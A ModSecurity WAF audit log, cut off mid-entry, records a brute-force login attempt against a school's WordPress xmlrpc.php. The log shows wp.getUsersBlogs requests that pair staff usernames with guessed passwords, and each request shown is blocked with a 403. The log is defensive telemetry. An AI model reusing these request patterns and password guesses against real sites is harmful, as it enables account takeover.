"ENABLED" --5acec148-Z-- --0215d449-A-- [07/Jun/2025:15:25:35 +0700] aEP3f_ClubEPOra_8UkF4QAAAAo 103.236.140.4 51764 103.236.140.4 8181 --0215d449-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0215d449-C-- wp.getUsersBlogs wakakur Sample123 --0215d449-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0215d449-E-- --0215d449-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284735516320 5277 (- - -) Stopwatch2: 1749284735516320 5277; combined=4027, p1=487, p2=3323, p3=0, p4=0, p5=123, sr=124, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0215d449-Z-- --64428849-A-- [07/Jun/2025:15:26:35 +0700] aEP3u_ClubEPOra_8UkGUAAAABI 103.236.140.4 53366 103.236.140.4 8181 --64428849-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --64428849-C-- wp.getUsersBlogs wakahumas Pakarmy@0882 --64428849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64428849-E-- --64428849-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284795234107 4684 (- - -) Stopwatch2: 1749284795234107 4684; combined=3374, p1=488, p2=2677, p3=0, p4=0, p5=121, sr=84, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64428849-Z-- --66ea6238-A-- [07/Jun/2025:15:27:35 +0700] aEP39xK9gc79coX6mHSJNgAAAFI 103.236.140.4 54978 103.236.140.4 8181 --66ea6238-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --66ea6238-C-- wp.getUsersBlogs wakahumas manutd --66ea6238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66ea6238-E-- --66ea6238-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284855218809 5377 (- - -) Stopwatch2: 1749284855218809 5377; combined=3852, p1=463, p2=3175, p3=0, p4=0, p5=123, sr=87, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66ea6238-Z-- --490dae77-A-- [07/Jun/2025:15:28:35 +0700] aEP4M_ClubEPOra_8UkHYAAAAA0 103.236.140.4 56660 103.236.140.4 8181 --490dae77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --490dae77-C-- wp.getUsersBlogs wakahumas 1g2w3e4r --490dae77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --490dae77-E-- --490dae77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284915109084 5084 (- - -) Stopwatch2: 1749284915109084 5084; combined=3738, p1=515, p2=3051, p3=0, p4=0, p5=100, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --490dae77-Z-- --2e7bdd3c-A-- [07/Jun/2025:15:29:35 +0700] aEP4b2COO9DrcKL2J_73KQAAANc 103.236.140.4 58350 103.236.140.4 8181 --2e7bdd3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2e7bdd3c-C-- wp.getUsersBlogs wakahumas marketing2021_ --2e7bdd3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e7bdd3c-E-- --2e7bdd3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (99+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284975287722 5650 (- - -) Stopwatch2: 1749284975287722 5650; combined=4194, p1=604, p2=3415, p3=0, p4=0, p5=104, sr=98, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e7bdd3c-Z-- --e19bf954-A-- [07/Jun/2025:15:30:35 +0700] aEP4q5ANhDjQAvBdMyHYrwAAAI4 103.236.140.4 59792 103.236.140.4 8181 --e19bf954-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e19bf954-C-- wp.getUsersBlogs wakahumas P@$$word --e19bf954-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e19bf954-E-- --e19bf954-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (96+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285035198971 3125 (- - -) Stopwatch2: 1749285035198971 3125; combined=2382, p1=288, p2=1978, p3=0, p4=0, p5=68, sr=50, sw=48, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e19bf954-Z-- --5a8d0654-A-- [07/Jun/2025:15:31:35 +0700] aEP452COO9DrcKL2J_73_gAAANg 103.236.140.4 33276 103.236.140.4 8181 --5a8d0654-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5a8d0654-C-- wp.getUsersBlogs wakahumas Daniel --5a8d0654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a8d0654-E-- --5a8d0654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285095656577 4807 (- - -) Stopwatch2: 1749285095656577 4807; combined=3805, p1=436, p2=3174, p3=0, p4=0, p5=112, sr=93, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a8d0654-Z-- --a1efeb5b-A-- [07/Jun/2025:15:32:36 +0700] aEP5JPClubEPOra_8UkJqgAAABc 103.236.140.4 35106 103.236.140.4 8181 --a1efeb5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a1efeb5b-C-- wp.getUsersBlogs wakahumas 1qaz@2wsx --a1efeb5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1efeb5b-E-- --a1efeb5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285156042914 5072 (- - -) Stopwatch2: 1749285156042914 5072; combined=3708, p1=464, p2=3074, p3=0, p4=0, p5=99, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1efeb5b-Z-- --5ca8640a-A-- [07/Jun/2025:15:33:40 +0700] aEP5ZPClubEPOra_8UkKOQAAAAM 103.236.140.4 37292 103.236.140.4 8181 --5ca8640a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5ca8640a-C-- wp.getUsersBlogs wakahumas cluster --5ca8640a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ca8640a-E-- --5ca8640a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (56+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285220097505 5816 (- - -) Stopwatch2: 1749285220097505 5816; combined=4322, p1=525, p2=3614, p3=0, p4=0, p5=108, sr=94, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca8640a-Z-- --ca303722-A-- [07/Jun/2025:15:34:40 +0700] aEP5oBK9gc79coX6mHSL3wAAAEs 103.236.140.4 39176 103.236.140.4 8181 --ca303722-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ca303722-C-- wp.getUsersBlogs wakahumas toos --ca303722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca303722-E-- --ca303722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285280233835 5444 (- - -) Stopwatch2: 1749285280233835 5444; combined=3739, p1=487, p2=3072, p3=0, p4=0, p5=105, sr=80, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca303722-Z-- --813f6f41-A-- [07/Jun/2025:15:35:41 +0700] aEP53ZANhDjQAvBdMyHbnQAAAJA 103.236.140.4 41180 103.236.140.4 8181 --813f6f41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --813f6f41-C-- wp.getUsersBlogs wakahumas qazxsw --813f6f41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --813f6f41-E-- --813f6f41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285341032388 6389 (- - -) Stopwatch2: 1749285341032388 6389; combined=4367, p1=519, p2=3654, p3=0, p4=0, p5=112, sr=91, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --813f6f41-Z-- --ffa10f1c-A-- [07/Jun/2025:15:35:44 +0700] aEP54PClubEPOra_8UkLYQAAABg 103.236.140.4 41288 103.236.140.4 8181 --ffa10f1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ffa10f1c-C-- wp.getUsersBlogs wakahumas 1234%^&* --ffa10f1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffa10f1c-E-- --ffa10f1c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285344550366 5777 (- - -) Stopwatch2: 1749285344550366 5777; combined=4010, p1=526, p2=3319, p3=0, p4=0, p5=100, sr=93, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffa10f1c-Z-- --9a4e923f-A-- [07/Jun/2025:15:36:41 +0700] aEP6GZANhDjQAvBdMyHcHAAAAIU 103.236.140.4 43128 103.236.140.4 8181 --9a4e923f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9a4e923f-C-- wp.getUsersBlogs wakahumas 212903 --9a4e923f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a4e923f-E-- --9a4e923f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285401199104 5049 (- - -) Stopwatch2: 1749285401199104 5049; combined=3579, p1=444, p2=2965, p3=0, p4=0, p5=98, sr=88, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a4e923f-Z-- --9bedea60-A-- [07/Jun/2025:15:37:41 +0700] aEP6VWCOO9DrcKL2J_76_wAAAMs 103.236.140.4 45076 103.236.140.4 8181 --9bedea60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9bedea60-C-- wp.getUsersBlogs wakahumas loveyou --9bedea60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bedea60-E-- --9bedea60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285461531836 5584 (- - -) Stopwatch2: 1749285461531836 5584; combined=3862, p1=504, p2=3191, p3=0, p4=0, p5=98, sr=78, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bedea60-Z-- --dbbaef72-A-- [07/Jun/2025:15:38:41 +0700] aEP6kWCOO9DrcKL2J_77jAAAAMQ 103.236.140.4 46800 103.236.140.4 8181 --dbbaef72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dbbaef72-C-- wp.getUsersBlogs wakasarpras wakasarpras1234 --dbbaef72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbbaef72-E-- --dbbaef72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285521287092 4842 (- - -) Stopwatch2: 1749285521287092 4842; combined=3788, p1=446, p2=3173, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbbaef72-Z-- --83dff571-A-- [07/Jun/2025:15:39:41 +0700] aEP6zWCOO9DrcKL2J_78ewAAAMo 103.236.140.4 48562 103.236.140.4 8181 --83dff571-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --83dff571-C-- wp.getUsersBlogs wakasarpras x4ivygA51F --83dff571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83dff571-E-- --83dff571-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 